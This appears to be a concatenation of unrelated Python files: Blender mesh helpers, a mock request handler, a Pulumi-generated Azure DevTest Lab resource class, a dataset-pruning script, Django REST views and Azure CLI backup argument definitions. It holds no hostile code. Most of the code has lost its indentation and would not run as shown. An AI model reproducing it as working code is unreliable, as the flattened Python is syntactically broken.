bmvs = None if verts is None else { self._unwrap(bmv) for bmv in verts }
return { self._wrap_bmedge(bme) for bme in self._visible_edges(is_visible, bmvs=bmvs) }
def visible_faces(self, is_visible, verts=None):
bmvs = None if verts is None else { self._unwrap(bmv) for bmv in verts }
bmfs = { self._wrap_bmface(bmf) for bmf in self._visible_faces(is_visible, bmvs=bmvs) }
#print('seeing %d / %d faces' % (len(bmfs), len(self.bme.faces)))
return bmfs
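# Hedged illustration (not part of the original class): raycast_all above marches a ray
# through the mesh, nudging the origin just past each hit so that later intersections are
# found. The standalone sketch below shows the same pattern on a BVHTree built from a
# unit cube; the geometry and the 1e-5 epsilon are assumptions for demonstration only.
def _raycast_all_demo():
    from mathutils import Vector as _Vec
    verts = [(x, y, z) for x in (0.0, 1.0) for y in (0.0, 1.0) for z in (0.0, 1.0)]
    faces = [(0, 1, 3, 2), (4, 5, 7, 6), (0, 1, 5, 4),
             (2, 3, 7, 6), (0, 2, 6, 4), (1, 3, 7, 5)]
    bvh = BVHTree.FromPolygons(verts, faces)
    origin, direction = _Vec((-1.0, 0.5, 0.5)), _Vec((1.0, 0.0, 0.0))
    hits = []
    while True:
        loc, nrm, idx, dist = bvh.ray_cast(origin, direction, 100.0)
        if loc is None: break
        hits.append((loc.copy(), idx))
        origin = loc + direction * 0.00001   # step just past the hit point
    return hits   # expect two hits: the x=0 face and the x=1 face of the cube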
|
class MockFile:
def read(self):
return False
class RequestHandler:
def __init__(self):
self.contentType = ""
self.contents = MockFile()
def getContents(self):
return self.contents.read()
def read(self):
return self.contents
def setStatus(self, status):
self.status = status
def getStatus(self):
return self.status
def getContentType(self):
return self.contentType
def getType(self):
return "static"
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['NotificationChannel']
class NotificationChannel(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
email_recipient: Optional[pulumi.Input[str]] = None,
events: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EventArgs']]]]] = None,
lab_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
notification_locale: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
web_hook_url: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
A notification.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: Description of notification.
:param pulumi.Input[str] email_recipient: The email recipient to send notifications to (can be a list of semi-colon separated email addresses).
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EventArgs']]]] events: The list of event for which this notification is enabled.
:param pulumi.Input[str] lab_name: The name of the lab.
:param pulumi.Input[str] location: The location of the resource.
:param pulumi.Input[str] name: The name of the notification channel.
:param pulumi.Input[str] notification_locale: The locale to use when sending a notification (fallback for unsupported languages is EN).
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: The tags of the resource.
:param pulumi.Input[str] web_hook_url: The webhook URL to send notifications to.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['description'] = description
__props__['email_recipient'] = email_recipient
__props__['events'] = events
if lab_name is None and not opts.urn:
raise TypeError("Missing required property 'lab_name'")
__props__['lab_name'] = lab_name
__props__['location'] = location
__props__['name'] = name
__props__['notification_locale'] = notification_locale
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['web_hook_url'] = web_hook_url
__props__['created_date'] = None
__props__['provisioning_state'] = None
__props__['type'] = None
__props__['unique_identifier'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:devtestlab:NotificationChannel"), pulumi.Alias(type_="azure-nextgen:devtestlab/latest:NotificationChannel"), pulumi.Alias(type_="azure-nextgen:devtestlab/v20160515:NotificationChannel")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(NotificationChannel, __self__).__init__(
'azure-nextgen:devtestlab/v20180915:NotificationChannel',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'NotificationChannel':
"""
Get an existing NotificationChannel resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return NotificationChannel(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="createdDate")
def created_date(self) -> pulumi.Output[str]:
"""
The creation date of the notification channel.
"""
return pulumi.get(self, "created_date")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Description of notification.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="emailRecipient")
def email_recipient(self) -> pulumi.Output[Optional[str]]:
"""
The email recipient to send notifications to (can be a list of semi-colon separated email addresses).
"""
return pulumi.get(self, "email_recipient")
@property
@pulumi.getter
def events(self) -> pulumi.Output[Optional[Sequence['outputs.EventResponse']]]:
"""
The list of event for which this notification is enabled.
"""
return pulumi.get(self, "events")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
The location of the resource.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="notificationLocale")
def notification_locale(self) -> pulumi.Output[Optional[str]]:
"""
The locale to use when sending a notification (fallback for unsupported languages is EN).
"""
return pulumi.get(self, "notification_locale")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning status of the resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
The tags of the resource.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="uniqueIdentifier")
def unique_identifier(self) -> pulumi.Output[str]:
"""
The unique immutable identifier of a resource (Guid).
"""
return pulumi.get(self, "unique_identifier")
@property
@pulumi.getter(name="webHookUrl")
def web_hook_url(self) -> pulumi.Output[Optional[str]]:
"""
The webhook URL to send notifications to.
"""
return pulumi.get(self, "web_hook_url")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
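# Hedged usage sketch (not part of the generated file): a NotificationChannel would
# normally be declared inside a Pulumi program rather than in this SDK module; the
# resource, lab and resource group names below are placeholders, and only properties
# declared above are set.
def _example_notification_channel():
    return NotificationChannel(
        "autoShutdownChannel",
        name="autoShutdown",
        lab_name="my-lab",
        resource_group_name="my-rg",
        description="Notify before auto-shutdown.",
        web_hook_url="https://example.com/hooks/devtestlab")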
|
import glob
import numpy as np
import cv2
import os
import random
label_list = glob.glob("./iafoss_data/256_filter/label/*.png")
file_list = glob.glob("./iafoss_data/256_filter/train/*.png")
assert len(label_list) == len(file_list), "error"
for i in range(len(label_list)):
label = cv2.imread(label_list[i], 0)
file = cv2.imread(file_list[i], 0)
print(label.sum())
if label.sum() == 0 and random.uniform(0,1) > 0.5:
os.remove(label_list[i])
os.remove(file_list[i])
|
from rest_framework import generics
from rest_framework.response import Response
from .request_dispatcher import dispatch_course_create_request
from .request_dispatcher import dispatch_course_get_request
from .request_dispatcher import (dispatch_student_create_request, dispatch_student_get_request,
dispatch_group_create_request, dispatch_group_get_request,
dispatch_update_student_details, dispatch_student_delete_request,
dispatch_assignment_get_request, dispatch_assignent_post_request)
from .request_dispatcher import (dispatch_course_delete_request, dispatch_group_delete_request,
dispatch_assignent_delete_request)
from .request_dispatcher import (dispatch_schedule_delete_request, dispatch_update_schedule_details,
dispatch_schedule_get_request, dispatch_schedule_create_request)
from .serializer import (CourseSerializer, GroupSerializer, StudentSerializer, AssignmentSerializer,
ScheduleSerializer)
error_response = {
"data": [],
"status": 1,
"message": "record"
}
class Course(generics.ListAPIView, generics.CreateAPIView):
"""
Course view
"""
def get(self, request, *args, **kwargs):
response = dispatch_course_get_request(request)
return Response(data=response)
def post(self, request, *args, **kwargs):
serializer = CourseSerializer(data=request.data)
if serializer.is_valid():
response = dispatch_course_create_request(request)
return Response(data=response['data'], status=response.get('status_code', 200))
else:
return Response(data=serializer.errors, status=400)
def delete(self, request, *args, **kwargs):
response = dispatch_course_delete_request(request)
return Response(data=response)
class Student(generics.ListAPIView, generics.CreateAPIView, generics.UpdateAPIView, generics.DestroyAPIView):
"""
Student view
"""
serializer_class = StudentSerializer
def get(self, request, *args, **kwargs):
response = dispatch_student_get_request(request)
return Response(data=response)
def post(self, request, *args, **kwargs):
serializer = StudentSerializer(data=request.data)
if serializer.is_valid():
response = dispatch_student_create_request(request)
return Response(data=response['data'], status=response.get('status_code', 200))
else:
return Response(data=serializer.errors, status=400)
def patch(self, request, *args, **kwargs):
response = dispatch_update_student_details(request)
return Response(data=response)
def delete(self, request, *args, **kwargs):
response = dispatch_student_delete_request(request)
status_code = None
if response:
status_code = 200
else:
status_code = 500
return Response(data=response, status=status_code)
class Schedule(generics.ListAPIView, generics.CreateAPIView, generics.UpdateAPIView, generics.DestroyAPIView):
"""
Schedule view
"""
serializer_class = ScheduleSerializer
def get(self, request, *args, **kwargs):
response = dispatch_schedule_get_request(request)
return Response(data=response)
def post(self, request, *args, **kwargs):
print(request.data)
serializer = ScheduleSerializer(data=request.data)
if serializer.is_valid():
response = dispatch_schedule_create_request(request)
return Response(data=response['data'], status=response.get('status_code', 200))
else:
return Response(data=serializer.errors, status=400)
def patch(self, request, *args, **kwargs):
response = dispatch_update_schedule_details(request)
return Response(data=response)
def delete(self, request, *args, **kwargs):
response = dispatch_schedule_delete_request(request)
status_code = None
if response:
status_code = 200
else:
status_code = 500
return Response(data=response, status=status_code)
class Group(generics.ListAPIView, generics.CreateAPIView):
"""
Group view
"""
def get(self, request, *args, **kwargs):
response = dispatch_group_get_request(request)
return Response(data=response)
def post(self, request, *args, **kwargs):
serializer = GroupSerializer(data=request.data)
if serializer.is_valid():
response = dispatch_group_create_request(serializer.data)
return Response(data=response['data'], status=response.get('status_code', 200))
else:
print(serializer.errors)
return Response(data=serializer.errors, status=400)
def delete(self, request, *args, **kwargs):
response = dispatch_group_delete_request(request)
status_code = None
if response:
status_code = 200
else:
status_code = 500
return Response(data=response, status=status_code)
class Assignment(generics.ListAPIView, generics.CreateAPIView):
"""
Assignment view
"""
def get(self, request, *args, **kwargs):
response = dispatch_assignment_get_request(request)
return Response(data=response)
def post(self, request, *args, **kwargs):
serializer = AssignmentSerializer(data=request.data)
if serializer.is_valid():
response = dispatch_assignent_post_request(serializer.data)
return Response(data=response['data'], status=response.get('status_code', 200))
else:
print(serializer.errors)
return Response(data=serializer.errors, status=400)
def delete(self, request, *args, **kwargs):
response = dispatch_assignent_delete_request(request)
return Response(data=response)
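# Hedged routing sketch (not part of the original module): this wiring would normally
# live in the app's urls.py and the URL prefixes are assumptions, shown only to
# illustrate how the class-based views above are exposed.
from django.urls import path
example_urlpatterns = [
    path('courses/', Course.as_view()),
    path('students/', Student.as_view()),
    path('schedules/', Schedule.as_view()),
    path('groups/', Group.as_view()),
    path('assignments/', Assignment.as_view()),
]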
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
from argcomplete.completers import FilesCompleter
from knack.arguments import CLIArgumentType
import azure.cli.core.commands.arm # pylint: disable=unused-import
from azure.cli.core.commands.parameters import \
(get_resource_name_completion_list, file_type, get_three_state_flag,
get_enum_type, tags_type)
from azure.cli.core.commands.validators import get_default_location_from_resource_group
from azure.cli.command_modules.backup._validators import \
(datetime_type)
# ARGUMENT DEFINITIONS
allowed_container_types = ['AzureIaasVM']
allowed_workload_types = ['VM', 'AzureFileShare', 'SAPHANA', 'MSSQL', 'SAPHanaDatabase', 'SQLDataBase']
allowed_azure_workload_types = ['MSSQL', 'SAPHANA', 'SAPASE', 'SAPHanaDatabase', 'SQLDataBase']
allowed_backup_management_types = ['AzureIaasVM', 'AzureStorage', 'AzureWorkload']
allowed_extended_backup_management_types = allowed_backup_management_types + ['MAB']
allowed_protectable_item_type = ['SQLAG', 'SQLInstance', 'SQLDatabase', 'HANAInstance', 'SAPHanaDatabase', 'SAPHanaSystem']
allowed_target_tier_type_chk_archivable = ['VaultArchive']
allowed_tier_type = ['VaultStandard', 'Snapshot', 'VaultArchive', 'VaultStandardRehydrated', 'SnapshotAndVaultStandard', 'SnapshotAndVaultArchive']
allowed_rehyd_priority_type = ['Standard', 'High']
backup_management_type_help = """Specify the backup management type. Define how Azure Backup manages the backup of entities within the ARM resource. For eg: AzureWorkloads refers to workloads installed within Azure VMs, AzureStorage refers to entities within Storage account. Required only if friendly name is used as Container name."""
container_name_help = """Name of the backup container. Accepts 'Name' or 'FriendlyName' from the output of az backup container list command. If 'FriendlyName' is passed then BackupManagementType is required."""
workload_type_help = """Specify the type of applications within the Resource which should be discovered and protected by Azure Backup. """
restore_mode_help = """Specify the restore mode."""
resolve_conflict_help = "Instruction if there's a conflict with the restored data."
resource_id_help = """ID of the Azure Resource containing items to be protected by Azure Backup service. Currently, only Azure VM resource IDs are supported."""
policy_help = """JSON encoded policy definition. Use the show command with JSON output to obtain a policy object. Modify the values using a file editor and pass the object."""
target_server_type_help = """Specify the type of the server which should be discovered."""
protectable_item_name_type_help = """Specify the resource name to be protected by Azure Backup service."""
backup_type_help = """'Full, Differential, Log, CopyOnlyFull' for backup Item type 'MSSQL'. 'Full, Differential' for backup item type 'SAPHANA'."""
retain_until_help = """The date until which this backed up copy will be available for retrieval, in UTC (d-m-Y). For SQL workload, retain-until can only be specified for backup-type 'CopyOnlyFull'. For HANA workload, user can't specify the value for retain-until. If not specified, 30 days will be taken as default value or as decided by service."""
diskslist_help = """List of disks to be excluded or included."""
disk_list_setting_help = """Option to decide whether to include or exclude the disk, or to reset any previous settings to the default behavior."""
target_container_name_help = """The target container to which the DB recovery point should be downloaded as files."""
target_tier_help = """The destination/target tier to which a particular recovery point has to be moved."""
tier_help = """Provide 'tier' parameter to filter recovery points."""
rehyd_priority_type_help = """The type of priority to be maintained while rehydrating a recovery point."""
infrastructure_encryption_type_help = """Use this parameter to enable/disable infrastructure encryption. This must be set when configuring encryption of the vault for the first time. Once enabled/disabled, infrastructure encryption setting cannot be changed. Default value: Disabled. Allowed values: Enabled, Disabled"""
vault_name_type = CLIArgumentType(help='Name of the Recovery services vault.', options_list=['--vault-name', '-v'], completer=get_resource_name_completion_list('Microsoft.RecoveryServices/vaults'))
container_name_type = CLIArgumentType(help=container_name_help, options_list=['--container-name', '-c'])
item_name_type = CLIArgumentType(help='Name of the backed up item.', options_list=['--item-name', '-i'])
policy_name_type = CLIArgumentType(help='Name of the backup policy.', options_list=['--policy-name', '-p'])
job_name_type = CLIArgumentType(help='Name of the job.', options_list=['--name', '-n'])
rp_name_type = CLIArgumentType(help='Name of the recovery point.', options_list=['--rp-name', '-r'])
backup_management_type = CLIArgumentType(help=backup_management_type_help, arg_type=get_enum_type(allowed_backup_management_types), options_list=['--backup-management-type'])
extended_backup_management_type = CLIArgumentType(help=backup_management_type_help, arg_type=get_enum_type(allowed_extended_backup_management_types), options_list=['--backup-management-type'])
workload_type = CLIArgumentType(help=workload_type_help, arg_type=get_enum_type(allowed_workload_types), options_list=['--workload-type'])
azure_workload_type = CLIArgumentType(help=workload_type_help, arg_type=get_enum_type(allowed_azure_workload_types), options_list=['--workload-type'])
restore_mode_type = CLIArgumentType(help=restore_mode_help, arg_type=get_enum_type(['OriginalLocation', 'AlternateLocation']), options_list=['--restore-mode'])
restore_mode_workload_type = CLIArgumentType(help=restore_mode_help, arg_type=get_enum_type(['AlternateWorkloadRestore', 'OriginalWorkloadRestore', 'RestoreAsFiles']), options_list=['--restore-mode'])
resolve_conflict_type = CLIArgumentType(help=resolve_conflict_help, arg_type=get_enum_type(['Overwrite', 'Skip']), options_list=['--resolve-conflict'])
resource_id_type = CLIArgumentType(help=resource_id_help, options_list=['--resource-id'])
policy_type = CLIArgumentType(help=policy_help, options_list=['--policy'], completer=FilesCompleter(), type=file_type)
protectable_item_type = CLIArgumentType(help=workload_type_help, options_list=['--protectable-item-type'], arg_type=get_enum_type(allowed_protectable_item_type))
target_server_type = CLIArgumentType(help=target_server_type_help, options_list=['--target-server-type'], arg_type=get_enum_type(allowed_protectable_item_type))
protectable_item_name_type = CLIArgumentType(help=protectable_item_name_type_help, options_list=['--protectable-item-name'])
diskslist_type = CLIArgumentType(nargs='+', help=diskslist_help)
target_container_name_type = CLIArgumentType(options_list=['--target-container-name'], help=target_container_name_help)
filepath_type = CLIArgumentType(options_list=['--filepath'], help="The path to which the DB should be restored as files.")
from_full_rp_type = CLIArgumentType(options_list=['--from-full-rp-name'], help="Name of the starting Recovery point.")
target_tier_type = CLIArgumentType(help=target_tier_help, arg_type=get_enum_type(allowed_target_tier_type_chk_archivable), options_list=['--target-tier'])
tier_type = CLIArgumentType(help=tier_help, arg_type=get_enum_type(allowed_tier_type), options_list=['--tier'])
rehyd_priority_type = CLIArgumentType(help=rehyd_priority_type_help, arg_type=get_enum_type(allowed_rehyd_priority_type), options_list=['--rehydration-priority'])
mi_user_assigned_type = CLIArgumentType(options_list=['--mi-user-assigned'], help="UserAssigned Identity Id to be used for CMK encryption, this will be applicable for encryption using userassigned identity")
mi_system_assigned_type = CLIArgumentType(action='store_true', options_list=['--mi-system-assigned'], help="Provide this flag to use system assigned identity for encryption.")
encryption_key_id_type = CLIArgumentType(options_list=['--encryption-key-id'], help="The encryption key id you want to use for encryption")
infrastructure_encryption_type = CLIArgumentType(options_list=['--infrastructure-encryption'], arg_type=get_enum_type(['Enabled', 'Disabled']), help=infrastructure_encryption_type_help)
user_assigned_type = CLIArgumentType(nargs='+', options_list=['--user-assigned'], help="Space-separated list of userassigned identities to be assigned to Recovery Services Vault.")
user_assigned_remove_type = CLIArgumentType(nargs='*', options_list=['--user-assigned'], help="Space-separated list of userassigned identities to be removed from Recovery Services Vault.")
system_assigned_remove_type = CLIArgumentType(action='store_true', options_list=['--system-assigned'], help="Provide this flag to remove system assigned identity for Recovery Services Vault.")
system_assigned_type = CLIArgumentType(action='store_true', options_list=['--system-assigned'], help="Provide this flag to enable system assigned identity for Recovery Services Vault.")
# pylint: disable=too-many-statements
def load_arguments(self, _):
with self.argument_context('backup') as c:
c.argument('force', action='store_true', help='Force completion of the requested action.')
# Vault
with self.argument_context('backup vault') as c:
c.argument('vault_name', vault_name_type, options_list=['--name', '-n'], id_part='name')
c.argument('location', validator=get_default_location_from_resource_group)
with self.argument_context('backup vault create') as c:
c.argument('tags', arg_type=tags_type)
with self.argument_context('backup vault backup-properties set') as c:
c.argument('backup_storage_redundancy', arg_type=get_enum_type(['GeoRedundant', 'LocallyRedundant', 'ZoneRedundant']), help='Set backup storage properties for a Recovery Services vault.')
c.argument('soft_delete_feature_state', arg_type=get_enum_type(['Enable', 'Disable']), help='Set soft-delete feature state for a Recovery Services Vault.')
c.argument('cross_region_restore_flag', arg_type=get_enum_type(['True', 'False']), help='Set cross-region-restore feature state for a Recovery Services Vault. Default: False.')
# Identity
with self.argument_context('backup vault identity assign') as c:
c.argument('vault_name', vault_name_type, options_list=['--name', '-n'], id_part='name')
c.argument('system_assigned', system_assigned_type)
c.argument('user_assigned', user_assigned_type)
with self.argument_context('backup vault identity remove') as c:
c.argument('vault_name', vault_name_type, options_list=['--name', '-n'], id_part='name')
c.argument('system_assigned', system_assigned_remove_type)
c.argument('user_assigned', user_assigned_remove_type)
with self.argument_context('backup vault identity show') as c:
c.argument('vault_name', vault_name_type, options_list=['--name', '-n'], id_part='name')
# Encryption
with self.argument_context('backup vault encryption') as c:
c.argument('vault_name', vault_name_type, options_list=['--name', '-n'], id_part='name')
with self.argument_context('backup vault encryption update') as c:
c.argument('encryption_key_id', encryption_key_id_type)
c.argument('infrastructure_encryption', infrastructure_encryption_type)
c.argument('mi_user_assigned', mi_user_assigned_type)
c.argument('mi_system_assigned', mi_system_assigned_type)
with self.argument_context('backup vault encryption show') as c:
c.argument('vault_name', vault_name_type, options_list=['--name', '-n'], id_part='name')
# Container
with self.argument_context('backup container') as c:
c.argument('vault_name', vault_name_type, id_part='name')
c.ignore('status')
with self.argument_context('backup container show') as c:
c.argument('name', container_name_type, options_list=['--name', '-n'], help='Name of the container. You can use the backup container list command to get the name of a container.', id_part='child_name_2')
c.argument('backup_management_type', extended_backup_management_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to show container in secondary region.')
with self.argument_context('backup container list') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('backup_management_type', extended_backup_management_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to list containers in secondary region.')
with self.argument_context('backup container unregister') as c:
c.argument('backup_management_type', extended_backup_management_type)
c.argument('container_name', container_name_type, id_part='child_name_2')
with self.argument_context('backup container re-register') as c:
c.argument('backup_management_type', backup_management_type)
c.argument('container_name', container_name_type, id_part='child_name_2')
c.argument('workload_type', azure_workload_type)
with self.argument_context('backup container register') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('backup_management_type', backup_management_type)
c.argument('resource_id', resource_id_type)
c.argument('workload_type', azure_workload_type)
# Item
with self.argument_context('backup item') as c:
c.argument('vault_name', vault_name_type, id_part='name')
c.argument('container_name', container_name_type, id_part='child_name_2')
with self.argument_context('backup item show') as c:
c.argument('name', item_name_type, options_list=['--name', '-n'], help='Name of the backed up item. You can use the backup item list command to get the name of a backed up item.', id_part='child_name_3')
c.argument('backup_management_type', extended_backup_management_type)
c.argument('workload_type', workload_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to show item in secondary region.')
# TODO: Need to use item.id once https://github.com/Azure/msrestazure-for-python/issues/80 is fixed.
with self.argument_context('backup item set-policy') as c:
c.argument('item_name', item_name_type, options_list=['--name', '-n'], help='Name of the backed up item. You can use the backup item list command to get the name of a backed up item.', id_part='child_name_3')
c.argument('policy_name', policy_name_type, help='Name of the Backup policy. You can use the backup policy list command to get the name of a backup policy.')
c.argument('backup_management_type', backup_management_type)
c.argument('workload_type', workload_type)
with self.argument_context('backup item list') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('backup_management_type', extended_backup_management_type)
c.argument('workload_type', workload_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to list items in secondary region.')
# Policy
with self.argument_context('backup policy') as c:
c.argument('vault_name', vault_name_type, id_part='name')
for command in ['show', 'delete', 'list-associated-items']:
with self.argument_context('backup policy ' + command) as c:
c.argument('name', policy_name_type, options_list=['--name', '-n'], help='Name of the backup policy. You can use the backup policy list command to get the name of a policy.', id_part='child_name_1')
with self.argument_context('backup policy list-associated-items') as c:
c.argument('backup_management_type', backup_management_type)
with self.argument_context('backup policy set') as c:
c.argument('policy', type=file_type, help='JSON encoded policy definition. Use the show command with JSON output to obtain a policy object. Modify the values using a file editor and pass the object.', completer=FilesCompleter())
c.argument('name', options_list=['--name', '-n'], help='Name of the Policy.', id_part='child_name_1')
c.argument('fix_for_inconsistent_items', arg_type=get_three_state_flag(), options_list=['--fix-for-inconsistent-items'], help='Specify whether or not to retry Policy Update for failed items.')
c.argument('backup_management_type', backup_management_type)
with self.argument_context('backup policy create') as c:
c.argument('policy', type=file_type, help='JSON encoded policy definition. Use the show command with JSON output to obtain a policy object. Modify the values using a file editor and pass the object.', completer=FilesCompleter())
c.argument('name', options_list=['--name', '-n'], help='Name of the Policy.')
c.argument('backup_management_type', backup_management_type)
c.argument('workload_type', workload_type)
with self.argument_context('backup policy list') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('backup_management_type', backup_management_type)
c.argument('workload_type', workload_type)
with self.argument_context('backup policy get-default-for-vm') as c:
c.argument('vault_name', vault_name_type, id_part=None)
# Recovery Point
# TODO: Need to use item.id once https://github.com/Azure/msrestazure-for-python/issues/80 is fixed.
with self.argument_context('backup recoverypoint') as c:
c.argument('vault_name', vault_name_type, id_part='name')
c.argument('container_name', container_name_type, id_part='child_name_2')
c.argument('item_name', item_name_type, id_part='child_name_3')
with self.argument_context('backup recoverypoint list') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('start_date', type=datetime_type, help='The start date of the range in UTC (d-m-Y).')
c.argument('end_date', type=datetime_type, help='The end date of the range in UTC (d-m-Y).')
c.argument('backup_management_type', backup_management_type)
c.argument('container_name', container_name_type)
c.argument('workload_type', workload_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to list recoverypoints in secondary region.')
c.argument('is_ready_for_move', arg_type=get_three_state_flag(), help='Use this flag to retrieve the recoverypoints that are ready to be moved to destination-tier.')
c.argument('target_tier', target_tier_type)
c.argument('tier', tier_type)
c.argument('recommended_for_archive', action="store_true", help='Use this flag to retrieve recommended archivable recoverypoints.')
with self.argument_context('backup recoverypoint move') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('container_name', container_name_type)
c.argument('rp_name', rp_name_type, options_list=['--name', '-n'], id_part='child_name_4')
c.argument('backup_management_type', backup_management_type)
c.argument('workload_type', workload_type)
c.argument('source_tier', help='The source tier from which a particular recovery point has to be moved.', arg_type=get_enum_type(['VaultStandard']), options_list=['--source-tier'])
c.argument('destination_tier', help=target_tier_help, arg_type=get_enum_type(['VaultArchive']), options_list=['--destination-tier'])
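# Example (illustrative, names are placeholders): move a recovery point from the standard tier
# to the archive tier:
#   az backup recoverypoint move --resource-group MyRG --vault-name MyVault \
#       --container-name MyVM --item-name MyVM --name <rp_name> \
#       --source-tier VaultStandard --destination-tier VaultArchive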
with self.argument_context('backup recoverypoint show-log-chain') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('start_date', type=datetime_type, help='The start date of the range in UTC (d-m-Y).')
c.argument('end_date', type=datetime_type, help='The end date of the range in UTC (d-m-Y).')
c.argument('backup_management_type', backup_management_type)
c.argument('container_name', container_name_type)
c.argument('workload_type', workload_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to list recoverypoints in secondary region.')
with self.argument_context('backup recoverypoint show') as c:
c.argument('name', rp_name_type, options_list=['--name', '-n'], help='Name of the recovery point. You can use the backup recovery point list command to get the name of a backed up item.', id_part='child_name_4')
c.argument('backup_management_type', backup_management_type)
c.argument('container_name', container_name_type)
c.argument('workload_type', workload_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to show recoverypoints in secondary region.')
# Protection
with self.argument_context('backup protection') as c:
c.argument('vault_name', vault_name_type, id_part='name')
c.argument('vm', help='Name or ID of the Virtual Machine to be protected.')
c.argument('policy_name', policy_name_type)
# TODO: Need to use item.id once https://github.com/Azure/msrestazure-for-python/issues/80 is fixed.
for command in ['backup-now', 'disable', 'resume', 'undelete', 'update-for-vm']:
with self.argument_context('backup protection ' + command) as c:
c.argument('container_name', container_name_type, id_part='child_name_2')
c.argument('item_name', item_name_type, id_part='child_name_3')
c.argument('backup_management_type', backup_management_type)
c.argument('workload_type', workload_type)
c.argument('enable_compression', arg_type=get_three_state_flag(), help='Option to enable compression')
c.argument('backup_type', help=backup_type_help, options_list=['--backup-type'])
with self.argument_context('backup protection backup-now') as c:
c.argument('retain_until', type=datetime_type, help=retain_until_help)
with self.argument_context('backup protection disable') as c:
c.argument('delete_backup_data', arg_type=get_three_state_flag(), help='Option to delete existing backed up data in the Recovery services vault.')
c.argument('backup_management_type', backup_management_type)
c.argument('workload_type', workload_type)
with self.argument_context('backup protection check-vm') as c:
c.argument('vm_id', help='ID of the virtual machine to be checked for protection.', deprecate_info=c.deprecate(redirect='--vm', hide=True))
with self.argument_context('backup protection enable-for-vm') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('diskslist', diskslist_type)
c.argument('disk_list_setting', arg_type=get_enum_type(['include', 'exclude']), options_list=['--disk-list-setting'], help=disk_list_setting_help)
c.argument('exclude_all_data_disks', arg_type=get_three_state_flag(), help='Use this flag to back up only the OS disk.')
with self.argument_context('backup protection update-for-vm') as c:
c.argument('diskslist', diskslist_type)
c.argument('disk_list_setting', arg_type=get_enum_type(['include', 'exclude', 'resetexclusionsettings']), options_list=['--disk-list-setting'], help=disk_list_setting_help)
c.argument('exclude_all_data_disks', arg_type=get_three_state_flag(), help='Use this flag to back up only the OS disk.')
